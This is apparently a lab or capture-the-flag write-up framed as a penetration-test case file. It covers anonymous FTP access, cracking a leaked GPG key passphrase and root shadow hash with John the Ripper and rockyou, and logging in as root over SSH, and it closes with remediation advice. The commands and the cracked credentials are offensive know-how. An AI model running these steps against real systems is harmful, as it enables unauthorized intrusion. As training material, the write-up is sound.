Case file

Anonymous FTP, GPG key crack, and root shadow reuse

Foundations Linux engagement: anonymous FTP exposed a GPG private key and encrypted shadow backup; cracked passphrase and root hash yielded direct SSH as root.

Foundations24 minLinux · FTP · GPG · Password Cracking
01

Engagement summary

Anonymous FTP leaked cryptographic material. Offline GPG and hash cracking recovered the root password without needing a low-privilege interactive foothold.

ANONFORCE exposed vsftpd with anonymous access and OpenSSH. FTP served the user artifact under melodias/ plus /notread containing backup.pgp and private.asc. gpg2john and John recovered passphrase xbox360; decrypting the backup revealed root’s $6$ hash. rockyou cracked hikari; SSH as root completed the engagement.

Business impact

Anonymous FTP that hosts private keys and shadow backups is a full compromise waiting for offline cracking. Disable anonymous FTP, never back up /etc/shadow to world-readable shares, and enforce strong GPG passphrases and root passwords.

02

Anonymous FTP enumeration

Anonymous login retrieved user.txt, backup.pgp, and private.asc.

OPERATOR · FTP

savvy@lab:~$ nmap -sC -sV 10.201.18.12

21/tcp open ftp vsftpd 3.0.3

22/tcp open ssh OpenSSH 7.2p2

savvy@lab:~$ ftp 10.201.18.12

Name: anonymous

ftp> get user.txt

ftp> cd notread

ftp> get backup.pgp

ftp> get private.asc

03

GPG passphrase and shadow decrypt

John cracked xbox360; gpg decrypted the backup containing root’s hash.

OPERATOR · GPG

savvy@lab:~$ gpg2john private.asc > privatex

savvy@lab:~$ john privatex --wordlist=/usr/share/wordlists/rockyou.txt

xbox360 (private.asc)

savvy@lab:~$ gpg --import private.asc && gpg --decrypt backup.pgp

root:$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a...

04

Root hash crack and SSH

John cracked hikari; SSH as root completed the case.

OPERATOR · ROOT

savvy@lab:~$ john hash -w=/usr/share/wordlists/rockyou.txt

hikari (root)

savvy@lab:~$ ssh root@10.201.18.12

root@lab:~# id

uid=0(root) gid=0(root) groups=0(root)

Remediation

Disable anonymous FTP; encrypt backups with unique strong secrets offline. Use SSH keys for root or disable password auth entirely.